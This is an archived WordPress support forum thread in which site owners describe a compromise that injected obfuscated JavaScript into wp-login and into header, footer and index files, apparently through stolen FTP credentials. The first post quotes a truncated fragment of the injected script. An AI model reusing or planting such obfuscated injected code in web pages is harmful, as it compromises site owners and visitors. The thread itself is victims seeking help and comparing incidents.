The Support Forums will be in read-only mode for a scheduled maintenance window on 01 September 2016 14:00 UTC - 20:00 UTC. More information.

2.5.1 hacked? (4 posts)

  1. mikejandreau
    Posted 8 years ago #

    Looks like at around 8:48AM this morning, someone got into my WordPress installs (all 11 of them, in my account), and managed to add code to wp-login:

    script language=JavaScript>function hmlyban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,52,34,14,32,57,59,46,0,

    Anyone know of any vulnerabilities? My directories were changed to 715 (I think my host did that) this morning, as well.

    Anyone know what's going on? I deleted the code, and uploaded a clean copy, and am checking the rest of my directories for stuff changed this morning, as well.

  2. mikejandreau
    Posted 8 years ago #

    They managed to hit files that weren't 775 or 777, mostly every header, footer, and index file in every directory in every domain.

    My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

  3. My host has been less than responsive (ignoring chats, and hanging up on me when I call)

    Anyone have any ideas?

    Switch hosts.

  4. dualtech
    Posted 8 years ago #

    I've seen almost exactly the same JS code inserted into HTML and PHP files for WP and non-WP sites. We are pretty sure ours was the result of a compromised client computer with cached FTP usernames and passwords.

    For each FTP account that was compromised the function name, the string passed to it, and the numeric array were different. In our case, they inserted the script at the opening and closing body tags of any documents that contained them.

Topic Closed

This topic has been closed to new replies.

About this Topic